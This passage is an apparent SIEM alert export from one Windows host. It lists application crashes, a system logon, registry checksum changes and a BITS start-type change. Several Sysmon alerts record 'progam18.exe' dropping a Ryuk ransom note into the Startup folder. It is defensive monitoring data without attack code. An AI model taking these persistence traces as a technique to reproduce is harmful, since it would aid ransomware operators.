+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1140.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_29686b7a1ac2a6a9b4db3f085a7951eb9cdb46_447869e0_0b9491d1-db03-4734-8e7c-3c73164d86a4 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 35e0382b-a496-47ea-9fb5-e4a8ca651f2d +Report Status: 268435456 +Hashed bucket: 70f67c91489ca0da48db9a551b8b1290 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:11:26.402",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). 
+ +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:11:25.833",10,"Multiple Windows error Application events",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x11f4 +Faulting application start time: 0x01d60cd5ab9bde4c +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 35e0382b-a496-47ea-9fb5-e4a8ca651f2d +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:11:20.190",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:10:57.991",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. 
+Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 26, 2020 @ 10:10:56.591",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c0c6695dce196a871da947899f40ca49' +New md5sum is : '77452a225ee13df710790a5b4f328a2c' +Old sha1sum was: 'c4e493209d7f483afd2384f0cd03f0f4ce89534c' +New sha1sum is : '35ff32bd38b77e38d2689d9661696e1637758085' +", +"Apr 26, 2020 @ 10:10:56.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '9b2eb62ca4c74330ffa1448b22e6dfac' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:10:53.592",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.997607900Z"",""eventRecordID"":""587"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.991\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files (x86)\\ossec-agent\\queue\\diff\\local\\users\\john 
williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\\last-entry.gz\r\nCreationUtcTime: 2020-04-07 12:16:58.991\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.991"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html\\\\last-entry.gz"",""creationUtcTime"":""2020-04-07 12:16:58.991""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.991 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html\last-entry.gz +CreationUtcTime: 2020-04-07 12:16:58.991""" +"Apr 26, 2020 @ 10:10:53.517",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.993466700Z"",""eventRecordID"":""586"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.975\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files 
(x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ryukreadme.html\r\nCreationUtcTime: 2020-04-07 12:16:58.975\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.975"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup\\\\ryukreadme.html"",""creationUtcTime"":""2020-04-07 12:16:58.975""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.975 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html +CreationUtcTime: 2020-04-07 12:16:58.975""" +"Apr 26, 2020 @ 10:10:53.477",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:58.990300100Z"",""eventRecordID"":""585"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:58.975\r\nProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100}\r\nProcessId: 1144\r\nImage: C:\\Program Files (x86)\\ossec-agent\\ossec-agent.exe\r\nTargetFilename: C:\\Program Files 
(x86)\\ossec-agent\\queue\\diff\\local\\users\\john williams\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\r\nCreationUtcTime: 2020-04-07 12:16:58.975\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:58.975"",""processGuid"":""{df9fc3d3-6de5-5e8c-0000-00109afc0100}"",""processId"":""1144"",""image"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\ossec-agent.exe"",""targetFilename"":""C:\\\\Program Files (x86)\\\\ossec-agent\\\\queue\\\\diff\\\\local\\\\users\\\\john williams\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\start menu\\\\programs\\\\startup"",""creationUtcTime"":""2020-04-07 12:16:58.975""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:58.975 +ProcessGuid: {df9fc3d3-6de5-5e8c-0000-00109afc0100} +ProcessId: 1144 +Image: C:\Program Files (x86)\ossec-agent\ossec-agent.exe +TargetFilename: C:\Program Files (x86)\ossec-agent\queue\diff\local\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup +CreationUtcTime: 2020-04-07 12:16:58.975""" +"Apr 26, 2020 @ 10:10:50.264",5,"File added to the system.","File 'c:\users\john williams\appdata\roaming\microsoft\windows\start menu\programs\startup\ryukreadme.html' was added. 
+(Audit) User: 'John Williams (S-1-5-21-438079597-2123118846-2669748851-1001)' +(Audit) Process id: '5876' +(Audit) Process name: 'C:\Users\John Williams\Downloads\progam18.exe' +", +"Apr 26, 2020 @ 10:10:50.170",12,"ATT&CK T1060: Potential Persistence Method via Startup Folder","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""11"",""version"":""2"",""level"":""4"",""task"":""11"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:16:57.597729300Z"",""eventRecordID"":""578"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""File created:\r\nRuleName: T1023\r\nUtcTime: 2020-04-07 12:16:57.585\r\nProcessGuid: {df9fc3d3-6ed8-5e8c-0000-001077171500}\r\nProcessId: 5876\r\nImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nTargetFilename: C:\\Users\\John Williams\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\RyukReadMe.html\r\nCreationUtcTime: 2020-04-07 12:16:57.585\""""},""eventdata"":{""ruleName"":""T1023"",""utcTime"":""2020-04-07 12:16:57.585"",""processGuid"":""{df9fc3d3-6ed8-5e8c-0000-001077171500}"",""processId"":""5876"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""targetFilename"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\RyukReadMe.html"",""creationUtcTime"":""2020-04-07 12:16:57.585""}}}","""File created: +RuleName: T1023 +UtcTime: 2020-04-07 12:16:57.585 +ProcessGuid: {df9fc3d3-6ed8-5e8c-0000-001077171500} +ProcessId: 5876 +Image: C:\Users\John Williams\Downloads\progam18.exe +TargetFilename: C:\Users\John Williams\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html +CreationUtcTime: 2020-04-07 12:16:57.585""" +"Apr 26, 2020 @ 
10:10:46.938",4,"Summary event of the report's signatures",,"""Fault bucket 1657758300517278340, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: cd4269a6 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B66.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER63C3.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER64FD.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65BB.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER68C9.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_smartscreen.exe_a7811b8033dd303c40b87ed1ad6c29cf39727bee_5d80af6c_337ef676-c6e8-4576-9f20-140739890c71 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 4254d034-ffd9-4e60-8a44-cb2496b08583 +Report Status: 268435456 +Hashed bucket: 0424f099e54e519237018a6421c9a284 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:42.281",4,"Summary event of the report's signatures",,"""Fault bucket 1296249511987065443, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: smartscreen.exe +P2: 10.0.18362.1 +P3: CD4269A6 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH5896.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER58A7.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5906.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER59A3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C92.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: f6228eb9-e4a1-4f79-b456-c520dc4a127f +Report Status: 268435456 +Hashed bucket: d71934d1179b2fac11fd341036433263 +Cab Guid: 0""" +"Apr 26, 
2020 @ 10:10:40.646",5,"Clipboard User Service_3d061 terminated unexpectedly",,"""The Clipboard User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:10:39.575",9,"Windows Application error event",,"""Faulting application name: smartscreen.exe, version: 10.0.18362.1, time stamp: 0xcd4269a6 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x156c +Faulting application start time: 0x01d60cd5b3870755 +Faulting application path: C:\Windows\System32\smartscreen.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4254d034-ffd9-4e60-8a44-cb2496b08583 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:10:39.059",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A8D.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D8C.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DBC.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DE9.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4ED5.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_0259995c-8623-44e9-a077-3d23fd76cc7b + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 20dee9e0-3b9a-4ba3-a845-f7cf0e4b830b +Report Status: 268435456 +Hashed bucket: 1b46097b621a046973ba8391e6fb0c20 +Cab Guid: 0""" +"Apr 26, 
2020 @ 10:10:38.006",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1634031 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.137.137.111:123) is working properly.""" +"Apr 26, 2020 @ 10:10:35.500",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xf50 +Faulting application start time: 0x01d60cd5aa0f5b70 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 20dee9e0-3b9a-4ba3-a845-f7cf0e4b830b +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:10:18.732",4,"Summary event of the report's signatures",,"""Fault bucket 1690539892258173001, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 1.20022.82.0 +P4: 5e7bebd4 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER298.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C8.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER303.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER381.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_5337c8d467985748fcf05be6446f8b17e2757f_3be56bc0_9cb25fb1-ffd9-4db6-acf3-5baf94394339 + +Analysis symbol: +Rechecking for 
solution: 0 +Report Id: a427b0c9-701d-451c-bf99-84ab7571b271 +Report Status: 268435456 +Hashed bucket: 76bad2dfd7175cc4e77601133cacf049 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:18.090",4,"Summary event of the report's signatures",,"""Fault bucket 1871217409248156477, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: YourPhoneServer.exe +P2: 1.20022.82.0 +P3: 5E7BEBD4 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH11D.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER12D.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER13E.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER14C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AB.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ad44a893-4aba-44d5-8418-658a0ce8b326 +Report Status: 268435456 +Hashed bucket: 0b3f12565ef2a8aa49f7e651cfc35b3d +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:17.199",9,"Windows Application error event",,"""Faulting application name: YourPhoneServer.exe, version: 1.20022.82.0, time stamp: 0x5e7bebd4 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x17f0 +Faulting application start time: 0x01d60cd5b88a8546 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe\YourPhoneServer\YourPhoneServer.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: a427b0c9-701d-451c-bf99-84ab7571b271 +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:10:15.467",4,"Summary event of the report's signatures",,"""Fault bucket 1610563783070951124, type 5 +Event Name: MoAppCrash +Response: Not available +Cab 
Id: 0 + +Problem signature: +P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF51A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF625.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF655.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF67C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6EB.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_9b4ff627d34cddc3d612adfa4c8dcd0365bb70_95f60aa5_a9f9da01-17f8-4bf5-b80e-20a16373f3f4 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 363914b3-ebf9-4430-b333-1effce4fb50e +Report Status: 268435456 +Hashed bucket: 9899f004d8650e352659df3a420da6d4 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:13.984",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1538 +Faulting application start time: 0x01d60cd5b30e224c +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 363914b3-ebf9-4430-b333-1effce4fb50e +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:10:12.880",4,"Summary event of the report's signatures",,"""Fault bucket 1445133708988233608, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: 
Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WEREAF8.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC90.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERECB0.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERECD6.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERED05.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_11cb9b8877caa9f72067315a9d734bc239156e36_fcf65235_386446a9-5128-4caf-b65c-b5fc2c961d6f + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 8bf84293-ca38-44a5-815f-fe4f9a42af3a +Report Status: 268435456 +Hashed bucket: 74de369fdf5b4d78040e2573a12fb788 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:11.278",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1324 +Faulting application start time: 0x01d60cd5ac691638 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 8bf84293-ca38-44a5-815f-fe4f9a42af3a +Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:10:10.120",4,"Summary event of the report's signatures",,"""Fault bucket 1340614098797145948, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5fefc7f9 +P4: ntdll.dll 
+P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE069.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE126.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE156.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE179.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERE1A9.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_taskhostw.exe_f03d5bcdadeaa8d94b71a3de2476f74781d7ec_77010e55_7fff375f-8305-40de-9e75-0afdb03869e5 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: a1d1d7f5-0634-4dbb-80a1-aa95f13bff47 +Report Status: 268435456 +Hashed bucket: 885ca8354b51bc10e29ad16b83af2f5c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:09.668",4,"Summary event of the report's signatures",,"""Fault bucket 1574314897565228993, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5FEFC7F9 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTHDF69.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF79.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF8A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA3.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFE2.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: e565fd10-b8ba-4edf-858f-82bdcd82b8a9 +Report Status: 268435456 +Hashed bucket: 7eb09b8cb07fb8ab75d9170ee9fb1fc1 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:10:09.620",9,"Windows Application error event",,"""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 
